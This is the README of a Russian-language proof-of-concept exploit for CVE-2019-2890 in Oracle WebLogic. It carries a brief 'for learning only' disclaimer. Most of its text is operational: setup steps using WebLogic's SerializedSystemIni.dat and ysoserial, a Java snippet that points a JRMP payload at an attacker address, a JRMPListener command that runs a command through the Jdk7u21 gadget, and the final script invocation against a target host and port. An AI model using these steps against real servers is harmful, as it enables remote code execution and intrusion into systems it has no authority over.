
PoC-эксплойт для CVE-2019-2890, нацеленный на Oracle WebLogic, использующий полезную нагрузку ysoserial JRMP для удалённого выполнения команд через десериализацию сериализованных объектов.
Только для обучения и обмена опытом. За иное использование ответственность несёте вы сами.
Все необходимые jar-файлы уже импортированы в проект, а в качестве метода эксплуатации используется JRMP из yso. При изучении и отладке способ эксплуатации можно изменить.
Сначала поместите файл SerializedSystemIni.dat из каталога weblogic в папку security.
Затем переименуйте yso в ysoserial.jar и импортируйте его в каталог lib.

Далее укажите IP-адрес и порт в методе getObject в файле weblogic/wsee/jaxws/persistence/PersistentContext.java.
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
Наконец, удалённо прослушивайте через JRMP и выполняйте команду с использованием 7u21.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
Порядок использования: запустите Poc.java для генерации сериализованного файла poc.ser, затем выполните:
python weblogic.py ip port poc.ser

